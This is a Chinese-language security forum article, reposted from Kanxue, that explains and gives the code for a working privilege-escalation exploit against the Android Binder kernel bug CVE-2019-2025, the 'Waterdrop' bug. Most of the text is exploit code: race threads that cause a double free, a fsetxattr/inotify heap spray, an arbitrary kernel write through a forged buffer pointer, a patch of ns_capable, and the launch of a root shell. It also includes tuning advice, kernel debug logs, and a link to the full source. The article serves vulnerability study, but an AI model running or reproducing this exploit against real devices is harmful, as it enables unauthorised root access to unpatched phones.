CVE-2019-2025(水滴) 漏洞利用
2019-10-12 01:36:42 Author: mp.weixin.qq.com(查看原文) 阅读量:139 收藏


本文为看雪论坛精华文章
看雪论坛作者ID:jltxgcy 

本文仅供学习交流,如作他用所承受的法律责任一概与作者无关。

一、漏洞介绍
CVE-2019-2025(水滴漏洞)由c0re team提出,并在HITBSecConf2019分享了漏洞利用方法,遗憾的是由于没有exploit源码,对于学习此漏洞还是不够直接。
本文将从exploit源码的角度来讲解此漏洞,在pixel手机上可实现99%概率成功root。同时也分享自己在写此漏洞的调试方式和解决各种问题的思路。
二、漏洞原理
关于原理我这里不再过多重述,请看“水滴”来袭:详解Binder内核通杀漏洞。简单说的两个线程会产生竞争关系。一个是client线程,一个是server线程。

图片1引用于《D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou》
client线程执行BC_FREE_BUFFER,代码如下:

图片2引用于《D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou》
server线程执行BC_REPLY,代码如下:

图片3引用于《D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou》

为什么要释放两次binder_buffer呢?
图片4引用于《D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou》
在前一个binder_buffer释放时,由于需要合并后一个binder_buffer,才会真正kfree后一个binder_buffer。
三、漏洞细节
1、Client线程如何才能执行BC_FREE_BUFFER,Server进程如何才能执行BC_REPLY(binder_alloc_new_buffer)。
class MediaPlayerBase : public MediaPlayer
{
    public:
        MediaPlayerBase() {};
        ~MediaPlayerBase() {};
        sp<IMediaPlayer> creatMediaPlayer()
        {
            sp<IMediaPlayerService> service(getMediaPlayer());
                sp<IMediaPlayer> player(service->create(this, getAudioSessionId()));
            return player;
        }
};
 
sp<IMediaPlayerService> getMediaPlayer()
{
    sp<IServiceManager> sm = defaultServiceManager();
    String16 name = String16("media.player");
    sp<IBinder> service = sm->checkService(name);
    sp<IMediaPlayerService> mediaService = interface_cast<IMediaPlayerService>(service);
 
    return mediaService;
 
}
 
void bc_free_buffer(int replyParcelIndex)
{
    replyArray[replyParcelIndex].~Parcel();
    IPCThreadState::self()->flushCommands();
}
 
void* bc_transaction(void *arg)
{
    .....
    dataBCArray[global_parcel_index].writeInterfaceToken(String16("android.media.IMediaPlayer"));
        IInterface::asBinder(mediaPlayer)->transact(GET_PLAYBACK_SETTINGS, dataBCArray[global_parcel_index], &replyBCArray[global_parcel_index], 0);
    .....
    return arg;
}
MediaPlayerBase* mediaPlayerBase = new MediaPlayerBase();
mediaPlayer = mediaPlayerBase->creatMediaPlayer();

此部分理解起来不难,由于使用了很多framework层的api,所以需要在android源码环境下编译。
2、我们刚刚说的执行BC_FREE_BUFFER,是需要提前分配binder_buffer,也就是分配后才能释放;这步叫放置诱饵。
void put_baits()
{
    
    for (int i = 0; i < BAIT; i++)
    {
        dataArray[i].writeInterfaceToken(String16("android.media.IMediaPlayer"));
        IInterface::asBinder(mediaPlayer)->transact(GET_PLAYBACK_SETTINGS, dataArray[i], &replyArray[i], 0);
        gDataArray[i] = replyArray[i].data();
        
        
    }
}
3、竞争
void bc_free_buffer(int replyParcelIndex)
{
    replyArray[replyParcelIndex].~Parcel();
    IPCThreadState::self()->flushCommands();
}
 
void* bc_transaction(void *arg)
{
    pthread_mutex_lock(&alloc_mutex);
    while(1)
    {
        pthread_cond_wait(&alloc_cond, &alloc_mutex);
        dataBCArray[global_parcel_index].writeInterfaceToken(String16("android.media.IMediaPlayer"));
                IInterface::asBinder(mediaPlayer)->transact(GET_PLAYBACK_SETTINGS, dataBCArray[global_parcel_index], &replyBCArray[global_parcel_index], 0);
    }
    pthread_mutex_unlock(&alloc_mutex);
        
    return arg;
}
 
void raceWin(int replyParcelIndex)
{
    pthread_mutex_lock(&alloc_mutex);
    bc_free_buffer(replyParcelIndex);
    global_parcel_index = replyParcelIndex;
    pthread_cond_signal(&alloc_cond);
    pthread_mutex_unlock(&alloc_mutex);
    usleep(450);
    bc_free_buffer(replyParcelIndex);
    bc_free_buffer(replyParcelIndex - 1);
}
 
void raceTimes()
{
    for(int i = BAIT - 1; i > 0; i--)
    {
        raceWin(i);
    }
}
起了两个线程,线程1执行BC_FREE_BUFFER,线程2会通过binder请求mediaserver进程执行BC_REPLY(binder_alloc_new_buffer)。线程1通过条件变量来唤醒线程2。

usleep(450);
bc_free_buffer(replyParcelIndex);
bc_free_buffer(replyParcelIndex - 1);
 

dataBCArray[global_parcel_index].writeInterfaceToken(String16("android.media.IMediaPlayer"));
                IInterface::asBinder(mediaPlayer)->transact(GET_PLAYBACK_SETTINGS, dataBCArray[global_parcel_index], &replyBCArray[global_parcel_index], 0);
线程1和线程2同步执行这两个操作,形成竞争。为什么usleep(450),这个因为线程2通过binder进程间通信,让mediaserver执行BC_REPLY需要一段时间,根据自己的机器情况调整这个值。
总之目的是让Client进程(BC_FREE_BUFFER)和Server进程(BC_REPLY)形成竞争。可以看下图1中所示BC_FREE_BUFFER和BC_REPLY的位置,有助于理解这块。这里所说的Server进程就是mediaserver进程。
4、堆喷
void heapGuard()
{
    fsetxattr(fd_guard_heap, "user.g", guardBuffer, 1000, 0);
}
 
void heap_spray()
{
    char buff[BUFF_SIZE];
    memset(buff, 0 ,BUFF_SIZE);
    *(size_t *)((char *)buff + 64) = 20;
    *(size_t *)((char *)buff + 88) = 0xffffffc001e50834;
    fsetxattr(fd_heap_spray, "user.x", buff, BUFF_SIZE, 0);
}
 
void heap_spray_times()
{
    for (int i = 0; i < HEAP_SPRAY_TIME; i++)
    {
        heap_spray();
        heapGuard();
    }
}
 
void raceWin(int replyParcelIndex)
{
    pthread_mutex_lock(&alloc_mutex);
    bc_free_buffer(replyParcelIndex);
    global_parcel_index = replyParcelIndex;
    pthread_cond_signal(&alloc_cond);
    pthread_mutex_unlock(&alloc_mutex);
    usleep(450);
    bc_free_buffer(replyParcelIndex);
    bc_free_buffer(replyParcelIndex - 1);
    heap_spray_times();
    ...
}

释放binder_buffer后堆喷,使用fsetxattr占用binder_buffer的data_size和data。
struct binder_buffer {
        struct list_head entry; 
        struct rb_node rb_node; 
                                
        unsigned free:1;
        unsigned allow_user_free:1;
        unsigned async_transaction:1;
        unsigned free_in_progress:1;
        unsigned debug_id:28;
 
        struct binder_transaction *transaction;
 
        struct binder_node *target_node;
        size_t data_size;
        size_t offsets_size;
        size_t extra_buffers_size;
        void *data;
};

因为要实现任意地址写,binder_buffer的data偏移为88,要修改为要写的任意地址,见heap_spray函数。
t->buffer = binder_alloc_new_buf(&target_proc->alloc, tr->data_size,
                tr->offsets_size, extra_buffers_size,
                !reply && (t->flags & TF_ONE_WAY));
        if (IS_ERR(t->buffer)) {
                
                return_error_param = PTR_ERR(t->buffer);
                return_error = return_error_param == -ESRCH ?
                        BR_DEAD_REPLY : BR_FAILED_REPLY;
                return_error_line = __LINE__;
                t->buffer = NULL;
                goto err_binder_alloc_buf_failed;
        }
        t->buffer->allow_user_free = 0;
        t->buffer->debug_id = t->debug_id;
        t->buffer->transaction = t;
        t->buffer->target_node = target_node;
        trace_binder_transaction_alloc_buf(t->buffer);
        off_start = (binder_size_t *)(t->buffer->data +
                                      ALIGN(tr->data_size, sizeof(void *)));
        offp = off_start;
 
        if (copy_from_user(t->buffer->data, (const void __user *)(uintptr_t)
                           tr->data.ptr.buffer, tr->data_size))
5、什么地址修改为什么内容呢?
参考内核镜像攻击,[原创] CVE-2017-7533 漏洞利用,0xffffffc001e50840需要被写入0x80000e71。看上面copy_from_user,t->buffer->data被占位为0xffffffc001e50834,源数据和sizetr->data.ptr.buffertr->data_size,那么怎么填充源数据和size呢?
status_t init_reply_data()
{
    setDataSource();
    AudioPlaybackRate rate;
    rate.mSpeed = 1;
    rate.mPitch = 1;
    rate.mStretchMode = (AudioTimestretchStretchMode)0;
    rate.mFallbackMode = (AudioTimestretchFallbackMode)0x80000e71;
        return mediaPlayer->setPlaybackSettings(rate);
}
具体是如何设置上的呢?读者可以对着binder进程间通信的流程来尝试理解。
此时目的地址设置为0xffffffc001e50834,源数据为0x80000e71,由于rate.mSpeed,rate.mPitch,rate.mStretchMode会占用12个字节,所以执行完copy_from_user后,0xffffffc001e50840地址被填充0x80000e71
此时可以在用户态任意地址读写了。
6、提权
void kernel_patch_ns_capable(unsigned long * addr) {
        unsigned int *p = (unsigned int *)addr;
 
        p[0] = 0xD2800020;
        p[1] = 0xD65F03C0;
}
 
unsigned long ns_capable_addr = 0xffffffc0000b1024 - 0xffffffc000000000 + 0xffffffc200000000;
        kernel_patch_ns_capable((unsigned long *) ns_capable_addr);
    if(setreuid(0, 0) || setregid(0, 0)){
             printf("[-] setgid failed\n");
        return -1;
        }
    if (getuid() == 0)
        {
                printf("[+] spawn a root shell\n");
                execl("/system/bin/sh", "/system/bin/sh", NULL);
        }
直接patch ns_capable函数,让他返回1,之后就可以成功调用setreuid和setregid了,提权成功。

关于ns_capable_addr地址的计算请参考[原创] CVE-2017-7533 漏洞利用

四、漏洞优化和漏洞调试
1、为了使client和server进程更容易产生竞争。需要使两者运行在同一个cpu上。
由于无法sched_setaffinity mediaserver进程的cpuid,我们使用的方法是每个cpu(4核让其中3核忙碌起来)起8个线程,并死循环耗尽cpu。
void* fillCpu(void *arg)
{
        int index = *(int *)arg;
    cpu_set_t mask;
        CPU_ZERO(&mask);
        CPU_SET(index, &mask);
    pid_t pid = gettid();
    syscall(__NR_sched_setaffinity, pid, sizeof(mask), &mask);
    
    while (!fillFlag)
    {
        index++;
    }
 
        return arg;
}
 
void fillOtherCpu()
{
    int cores = getCores();
    printf("[+] cpu count:%d\n", cores);
    pthread_t id_cpu1, id1_cpu1, id2_cpu1, id3_cpu1, id4_cpu1, id5_cpu1, id6_cpu1, id7_cpu1;
    pthread_t id_cpu2, id1_cpu2, id2_cpu2, id3_cpu2, id4_cpu2, id5_cpu2, id6_cpu2, id7_cpu2;
    pthread_t id_cpu3, id1_cpu3, id2_cpu3, id3_cpu3, id4_cpu3, id5_cpu3, id6_cpu3, id7_cpu3;
    int cpu1 = 0;
    int cpu2 = 2;
    int cpu3 = 3;
    pthread_create(&id_cpu1, NULL, fillCpu, &cpu1);
    pthread_create(&id1_cpu1, NULL, fillCpu, &cpu1);
    pthread_create(&id2_cpu1, NULL, fillCpu, &cpu1);
    pthread_create(&id3_cpu1, NULL, fillCpu, &cpu1);
    pthread_create(&id4_cpu1, NULL, fillCpu, &cpu1);
    pthread_create(&id5_cpu1, NULL, fillCpu, &cpu1);
    pthread_create(&id6_cpu1, NULL, fillCpu, &cpu1);
    pthread_create(&id7_cpu1, NULL, fillCpu, &cpu1);
 
    pthread_create(&id_cpu2, NULL, fillCpu, &cpu2);
    pthread_create(&id1_cpu2, NULL, fillCpu, &cpu2);
    pthread_create(&id2_cpu2, NULL, fillCpu, &cpu2);
    pthread_create(&id3_cpu2, NULL, fillCpu, &cpu2);
    pthread_create(&id4_cpu2, NULL, fillCpu, &cpu2);
    pthread_create(&id5_cpu2, NULL, fillCpu, &cpu2);
    pthread_create(&id6_cpu2, NULL, fillCpu, &cpu2);
    pthread_create(&id7_cpu2, NULL, fillCpu, &cpu2);
 
    pthread_create(&id_cpu3, NULL, fillCpu, &cpu3);
    pthread_create(&id1_cpu3, NULL, fillCpu, &cpu3);
    pthread_create(&id2_cpu3, NULL, fillCpu, &cpu3);
    pthread_create(&id3_cpu3, NULL, fillCpu, &cpu3);
    pthread_create(&id4_cpu3, NULL, fillCpu, &cpu3);
    pthread_create(&id5_cpu3, NULL, fillCpu, &cpu3);
    pthread_create(&id6_cpu3, NULL, fillCpu, &cpu3);
    pthread_create(&id7_cpu3, NULL, fillCpu, &cpu3);
    sleep(10);
}
2、fsetxattr堆喷后会立刻释放内存。
static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
     size_t size, int flags)

{
    int error;
    void *kvalue = NULL;
    void *vvalue = NULL;
    char kname[XATTR_NAME_MAX + 1];
 
    if (flags & ~(XATTR_CREATE|XATTR_REPLACE))
        return -EINVAL;
 
    error = strncpy_from_user(kname, name, sizeof(kname));
    if (error == 0 || error == sizeof(kname))
        error = -ERANGE;
    if (error < 0)
        return error;
 
    if (size) {
        if (size > XATTR_SIZE_MAX)
            return -E2BIG;
        kvalue = kmalloc(size, GFP_KERNEL | __GFP_NOWARN);
        if (!kvalue) {
            vvalue = vmalloc(size);
            if (!vvalue)
                return -ENOMEM;
            kvalue = vvalue;
        }
        if (copy_from_user(kvalue, value, size)) {
            error = -EFAULT;
            goto out;
        }
        if ((strcmp(kname, XATTR_NAME_POSIX_ACL_ACCESS) == 0) ||
            (strcmp(kname, XATTR_NAME_POSIX_ACL_DEFAULT) == 0))
            posix_acl_fix_xattr_from_user(kvalue, size);
    }
 
    error = vfs_setxattr(d, kname, kvalue, size, flags);
out:
    if (vvalue)
        vfree(vvalue);
    else
        kfree(kvalue);
    return error;
}

如果仅仅循环调用fsetxattr,你会发现自己的堆喷地址总是一样的,因为分配出来就被立刻free了。
所以采用一个申请后并不会马上释放的结构体来占住刚刚被free的内存。我们使用的结构体是inotify_event_info。

图片5引用于《D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou》
void heapGuard()
{
    fsetxattr(fd_guard_heap, "user.g", guardBuffer, 1000, 0);
}
fsetxattr由于改变了文件的扩展属性,会触发文件监控,调用到inotify_handle_event,调用kmalloc分配event。
由于fsetxattr调用kmalloc分配的kvalue大小是96个字节,inotify_handle_event调用kmalloc分配的event大小这里设定为65个字节(文件名为fffdfffdfffdfffd),目的是占位刚刚被setxattr释放的内存,且分配的event不会被立刻释放,也就保护了kvalue的内容。
此时如果再次调用fsetxattr(之前已经调用了一次fsetxattrinotify_handle_event)分配内存kvalue,由于刚刚被释放掉的kvalue已经被event占用了,此时会分配新的空间,这样就为堆喷占位提供了条件。
这里注意要巧妙设置event的长度,不要破坏fsetxattr分配kvalue的64和88偏移,因为这里保存的信息,在copy_from_user时会用到。

图片6引用于《D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou》
途中Sate area就是fsetxattr分配kvalue的64和88偏移的内容,此部分内容不要被破坏哦。
3、设置client进程优先级大于server进程优先级,目的是让client进程抢占server进程。
int main()
{
    createAllocThread();
    nice(-20);
    MediaPlayerBase* mediaPlayerBase = new MediaPlayerBase();
    mediaPlayer = mediaPlayerBase->creatMediaPlayer();
        .....
}

是在启动了分配线程后,才设置的优先级,这是因为分配线程的优先级会影响server进程的优先级。
4、堆喷保护细节
void begin_watch()
{
        watch_fd = inotify_init1(IN_NONBLOCK);
        if (watch_fd == -1) {
                printf("[-] inotify_init1 failed\n");
                return;
        }
 
        watch_wd = inotify_add_watch(watch_fd, "test_dir",
                                 IN_ALL_EVENTS);
        if (watch_wd == -1) {
                printf("[-] Cannot watch\n");
                return;
        }
}
 
void stop_watch()
{
    inotify_rm_watch(watch_fd, watch_wd);
    if (watch_fd != 1)
    {
        close(watch_fd);
    }
}
 
void restartWatch()
{
    if (global_parcel_index % 200 == 0)
    {
        stop_watch();
        usleep(100);
        begin_watch();
        usleep(100);
    }
}
 
void raceWin(int replyParcelIndex)
{
    pthread_mutex_lock(&alloc_mutex);
    bc_free_buffer(replyParcelIndex);
    global_parcel_index = replyParcelIndex;
    pthread_cond_signal(&alloc_cond);
    pthread_mutex_unlock(&alloc_mutex);
    usleep(450);
    bc_free_buffer(replyParcelIndex);
    bc_free_buffer(replyParcelIndex - 1);
    heap_spray_times();
    restartWatch();
}

我们可以看到每隔200次循环,就要重新启动一次监控,这是为什么?
int fsnotify_add_event(struct fsnotify_group *group,
               struct fsnotify_event *event,
               int (*merge
)(struct list_head *,
                    struct fsnotify_event *
))
{
    int ret = 0;
    struct list_head *list = &group->notification_list;
 
    pr_debug("%s: group=%p event=%p\n", __func__, group, event);
 
    mutex_lock(&group->notification_mutex);
 
    if (group->q_len >= group->max_events) {
        ret = 2;
        
        if (!list_empty(&group->overflow_event->list)) {
            mutex_unlock(&group->notification_mutex);
            return ret;
        }
        event = group->overflow_event;
        goto queue;
    }
       ...
}

因为超过一定数量,分配event后会被立刻free掉,这显然是不符合我们的预期,且会造成crash;可能由于释放的地址,没有被成功占位,被其他线程占据后值被清0,这样就导致t->buffer->data为0,进而crash。
重新开启监控首先会释放原有分配的所有event,再分配的event不会超过限额。
5、漏洞调试
如果没有printk,我们怎么知道是否竞争成功呢,是否堆喷占位正确呢?所以需要在对应的代码上加上printk。

struct binder_buffer *binder_alloc_prepare_to_free(struct binder_alloc *alloc,
                                                   uintptr_t user_ptr)
{
        struct binder_buffer *buffer;
        printk(KERN_INFO "jltxgcy binder free begin, pid:%d, user addr:%016llx\n", alloc->pid, (u64)user_ptr);
        mutex_lock(&alloc->mutex);
        buffer = binder_alloc_prepare_to_free_locked(alloc, user_ptr);
        mutex_unlock(&alloc->mutex);
        printk(KERN_INFO "jltxgcy binder free end, pid:%d, buffer:%p\n", alloc->pid, buffer);
        return buffer;
}
 
struct binder_buffer *binder_alloc_new_buf(struct binder_alloc *alloc,
                                           size_t data_size,
                                           size_t offsets_size,
                                           size_t extra_buffers_size,
                                           int is_async)
{
        struct binder_buffer *buffer;
 
        mutex_lock(&alloc->mutex);
        printk(KERN_INFO "jltxgcy binder alloc begin, target pid:%d\n", alloc->pid);
        buffer = binder_alloc_new_buf_locked(alloc, data_size, offsets_size,
                                             extra_buffers_size, is_async);
        printk(KERN_INFO "jltxgcy binder alloc end, target pid:%d, buffer:%p, buffer user data:%lx\n", alloc->pid, buffer, (uintptr_t)buffer->data + binder_alloc_get_user_buffer_offset(alloc));
        mutex_unlock(&alloc->mutex);
        return buffer;
}
 
static void binder_delete_free_buffer(struct binder_alloc *alloc,
                      struct binder_buffer *buffer)
{
    struct binder_buffer *prev, *next = NULL;
    bool to_free = true;
    BUG_ON(alloc->buffers.next == &buffer->entry);
    prev = binder_buffer_prev(buffer);
    BUG_ON(!prev->free);
    if (prev_buffer_end_page(prev) == buffer_start_page(buffer)) {
        to_free = false;
        binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC,
                   "%d: merge free, buffer %pK share page with %pK\n",
                   alloc->pid, buffer->data, prev->data);
    }
 
    if (!list_is_last(&buffer->entry, &alloc->buffers)) {
        next = binder_buffer_next(buffer);
        if (buffer_start_page(next) == buffer_start_page(buffer)) {
            to_free = false;
            binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC,
                       "%d: merge free, buffer %pK share page with %pK\n",
                       alloc->pid,
                       buffer->data,
                       next->data);
        }
    }
 
    if (PAGE_ALIGNED(buffer->data)) {
        binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC,
                   "%d: merge free, buffer start %pK is page aligned\n",
                   alloc->pid, buffer->data);
        to_free = false;
    }
 
    if (to_free) {
        binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC,
                   "%d: merge free, buffer %pK do not share page with %pK or %pK\n",
                   alloc->pid, buffer->data,
                   prev->data, next->data);
        binder_update_page_range(alloc, 0, buffer_start_page(buffer),
                     buffer_start_page(buffer) + PAGE_SIZE);
    }
    list_del(&buffer->entry);
    kfree(buffer);
    printk(KERN_INFO "jltxgcy pid:%d, kfree:%p, cpuid:%d\n", alloc->pid, buffer, smp_processor_id());
}
 

static void binder_transaction(struct binder_proc *proc,
                   struct binder_thread *thread,
                   struct binder_transaction_data *tr, int reply,
                   binder_size_t extra_buffers_size) {
    t->buffer = binder_alloc_new_buf(&target_proc->alloc, tr->data_size,
        tr->offsets_size, extra_buffers_size,
        !reply && (t->flags & TF_ONE_WAY));
     
    if (IS_ERR(t->buffer)) {
        
        return_error_param = PTR_ERR(t->buffer);
        return_error = return_error_param == -ESRCH ?
            BR_DEAD_REPLY : BR_FAILED_REPLY;
        return_error_line = __LINE__;
        t->buffer = NULL;
        goto err_binder_alloc_buf_failed;
    }
     
    t->buffer->allow_user_free = 0;
    t->buffer->debug_id = t->debug_id;
    t->buffer->transaction = t;
    t->buffer->target_node = target_node;
    trace_binder_transaction_alloc_buf(t->buffer);
    off_start = (binder_size_t *)(t->buffer->data +
                      ALIGN(tr->data_size, sizeof(void *)));
    offp = off_start;
 
    printk(KERN_INFO "jltxgcy binder ocuppy end, target pid:%d, buffer:%p, free:%d, user_allow_free:%d, buffer data:%p, buffer user data:%lx, cupid:%d\n", target_proc->pid, t->buffer, t->buffer->free, t->buffer->allow_user_free, t->buffer->data, (uintptr_t)t->buffer->data + binder_alloc_get_user_buffer_offset(&target_proc->alloc), smp_processor_id());
    if (copy_from_user(t->buffer->data, (const void __user *)(uintptr_t)
               tr->data.ptr.buffer, tr->data_size)) {
        binder_user_error("%d:%d got transaction with invalid data ptr\n",
                proc->pid, thread->pid);
        return_error = BR_FAILED_REPLY;
        return_error_param = -EFAULT;
        return_error_line = __LINE__;
        goto err_copy_data_failed;
    }
        ....
}
 

static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
     size_t size, int flags)
{
    int error;
    void *kvalue = NULL;
    void *vvalue = NULL;
    char kname[XATTR_NAME_MAX + 1];
 
    if (flags & ~(XATTR_CREATE|XATTR_REPLACE))
        return -EINVAL;
 
    error = strncpy_from_user(kname, name, sizeof(kname));
    if (error == 0 || error == sizeof(kname))
        error = -ERANGE;
    if (error < 0)
        return error;
 
    if (size) {
        if (size > XATTR_SIZE_MAX)
            return -E2BIG;
        kvalue = kmalloc(size, GFP_KERNEL | __GFP_NOWARN);
        printk(KERN_INFO "jltxgcy pid:%d, kvalue:%p, size:%ld\n", current->pid, kvalue, size);
        if (!kvalue) {
            vvalue = vmalloc(size);
            if (!vvalue)
                return -ENOMEM;
            kvalue = vvalue;
        }
        if (copy_from_user(kvalue, value, size)) {
            error = -EFAULT;
            goto out;
        }
        if ((strcmp(kname, XATTR_NAME_POSIX_ACL_ACCESS) == 0) ||
            (strcmp(kname, XATTR_NAME_POSIX_ACL_DEFAULT) == 0))
            posix_acl_fix_xattr_from_user(kvalue, size);
    }
 
    error = vfs_setxattr(d, kname, kvalue, size, flags);
out:
    if (vvalue)
        vfree(vvalue);
    else
        kfree(kvalue);
    return error;
}
 

int inotify_handle_event(struct fsnotify_group *group,
             struct inode *inode,
             struct fsnotify_mark *inode_mark,
             struct fsnotify_mark *vfsmount_mark,
             u32 mask, void *data, int data_type,
             const unsigned char *file_name, u32 cookie)
{
    struct inotify_inode_mark *i_mark;
    struct inotify_event_info *event;
    struct fsnotify_event *fsn_event;
    int ret;
    int len = 0;
    int alloc_len = sizeof(struct inotify_event_info);
    BUG_ON(vfsmount_mark);
 
    if ((inode_mark->mask & FS_EXCL_UNLINK) &&
        (data_type == FSNOTIFY_EVENT_PATH)) {
        struct path *path = data;
 
        if (d_unlinked(path->dentry))
            return 0;
    }
    if (file_name) {
        len = strlen(file_name);
        alloc_len += len + 1;
    }
 
    pr_debug("%s: group=%p inode=%p mask=%x\n", __func__, group, inode,
         mask);
 
    i_mark = container_of(inode_mark, struct inotify_inode_mark,
                  fsn_mark);
 
    event = kmalloc(alloc_len, GFP_KERNEL);
    printk(KERN_INFO "jltxgcy pid:%d, event:%p, alloc_len:%d\n", current->pid, event, alloc_len);
    if (unlikely(!event))
        return -ENOMEM;
 
    fsn_event = &event->fse;
    fsnotify_init_event(fsn_event, inode, mask);
    event->wd = i_mark->wd;
    event->sync_cookie = cookie;
    event->name_len = len;
    if (len)
        strcpy(event->name, file_name);
    ret = fsnotify_add_event(group, fsn_event, inotify_merge);
    if (ret) {
        
        fsnotify_destroy_event(group, fsn_event);
    }
 
    if (inode_mark->mask & IN_ONESHOT)
        fsnotify_destroy_mark(inode_mark, group);
 
    return 0;
}

如果堆喷占位成功,日志应该是这样的:
[ 53.486434] c1   2536 jltxgcy binder alloc begin, target pid:2522
[ 53.486488] c1   2522 jltxgcy binder free begin, pid:2522, user addr:0000007dd3b3c8f0
[ 53.486523] c1   2536 jltxgcy binder alloc end, target pid:2522, buffer:ffffffc06ef79400, buffer user data:7dd3b3c8f0
[ 53.486543] c1   2522 jltxgcy binder free end, pid:2522, buffer:ffffffc06ef79400
[ 53.486554] c1   2522 jltxgcy pid:2522, kfree:ffffffc0be588280, cpuid:1
[ 53.486570] c1   2522 jltxgcy binder free begin, pid:2522, user addr:0000007dd3b3c8d8
[ 53.486577] c1   2522 jltxgcy binder free end, pid:2522, buffer:ffffffc06ef79280
[ 53.486585] c1   2522 jltxgcy pid:2522, kfree:ffffffc06ef79400, cpuid:1
[ 53.486604] c1   2522 jltxgcy pid:2522, kvalue:ffffffc0be588280, size:96
[ 53.486746] c1   2522 jltxgcy pid:2522, event:ffffffc0be588300, alloc_len:54
[ 53.486763] c1   2522 jltxgcy pid:2522, kvalue:ffffffc0c42bf400, size:1000
[ 53.486795] c1   2522 jltxgcy pid:2522, event:ffffffc0be588280, alloc_len:65
.............占位kfree:ffffffc06ef79400成功 省略了
jltxgcy binder ocuppy end, target pid:2522, buffer:ffffffc06ef79400, free:0, user_allow_free:0, buffer data:ffffffc001e50834, buffer user data:7dd3b3c8f0, cupid:1

我们可以看到alloc begin是打的位置是在mutex_lock(&alloc->mutex)锁里面,而free begin是在mutex_lock(&alloc->mutex)锁外面,所以执行流程是server alloc_begin进入锁,此时client free_begin申请锁睡眠等待,然后server alloc_end释放锁,同时唤醒client 获取锁执行free end。
之所以让client和server占用一个cpu,也是因为这里的等待唤醒机制,在狭窄窗口到来时唤醒client进程,形成竞争。
之后我们再释放前一个binder_buffer时,会kfree当前binder_buffer,kfree:ffffffc06ef79400,然后堆喷占位成功,最后一条日志,可以看到binder_data已经被赋值为目标地址fffffc001e50834。
6、再次理解堆喷占位
[ 53.486604] c1   2522 jltxgcy pid:2522, kvalue:ffffffc0be588280, size:96        
[ 53.486746] c1   2522 jltxgcy pid:2522, event:ffffffc0be588300, alloc_len:54  
[ 53.486763] c1   2522 jltxgcy pid:2522, kvalue:ffffffc0c42bf400, size:1000     
[ 53.486795] c1   2522 jltxgcy pid:2522, event:ffffffc0be588280, alloc_len:65  

由于我们调用了两次fsetxattr,所以会形成如上的日志。
我们的目标是占位4,覆盖占位1。所以我精心设计了占位2,占位3的大小,以避免占位2和占位3把占位1给覆盖了。
7、heapGuard为什么不用open函数,常规触发inotify_handle_event,是使用open的。
实际上我最开始使用的open,但是发现占位2总是覆盖不上占位1,最后发现open函数调用连上error = security_file_alloc(f);这个函数把占位1的位置给覆盖了,所以后来选用了setxattr函数。
8、占位2的大小实际上是精心设计的,否则会crash。
binder_transaction,copy_from_user后会有一个检查,BUG_ON(t->buffer->async_transaction != 0);如果t->buffer->async_transaction不等于0,会crash。

图片7引用于《D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou》
从上图可以看到async_transaction正是name_len的值,所以这个我设置为8,async_transaction为0,这也就是abcd.txt(长度为8)的来源。
void init_fd_heap_spray()
{
    const char * path = "/data/local/tmp/test_dir/abcd.txt";
        fd_heap_spray = open(path, O_WRONLY);
    if (fd_heap_spray < 0)
    {
        printf("[-] fd_heap_spray failed\n");
    }
}

五、老规矩上图
致谢:
感谢@牛maomao,关于漏洞利用细节给了很多建设性的意见,也让我深刻感到自己和大牛之间的差距。
源码地址:
https://github.com/jltxgcy/CVE_2019_2025_EXP

参考:

[1]https://conference.hitb.org/hitbsecconf2019ams/materials/D2T2%20-%20Binder%20-%20The%20Bridge%20to%20Root%20-%20Hongli%20Han%20&%20Mingjian%20Zhou.pdf

[2] http://blogs.360.cn/post/Binder_Kernel_Vul_CH.html

[3][原创](Android Root)CVE-2017-7533 漏洞分析和复现 https://bbs.pediy.com/thread-248481.htm

[4][分享] KSMA -- Android 通用 Root 技术 https://bbs.pediy.com/thread-248444.htm
- End -

看雪ID:jltxgcy 

https://bbs.pediy.com/user-620204.htm 

*本文由看雪论坛  jltxgcy  原创,转载请注明来自看雪社区

推荐文章++++

PWN入门的一些总结

固件分析--工具、方法技巧浅析(上)

固件分析--工具、方法技巧浅析(下)

7种Android Native Anti Hook的实现思路

经典整数溢出漏洞示例 XCTF int_overflow

进阶安全圈,不得不读的一本书

“阅读原文”一起来充电吧!

文章来源: https://mp.weixin.qq.com/s/BviSkiO1sizlS1T_WRkkaQ
如有侵权请联系:admin#unsafe.sh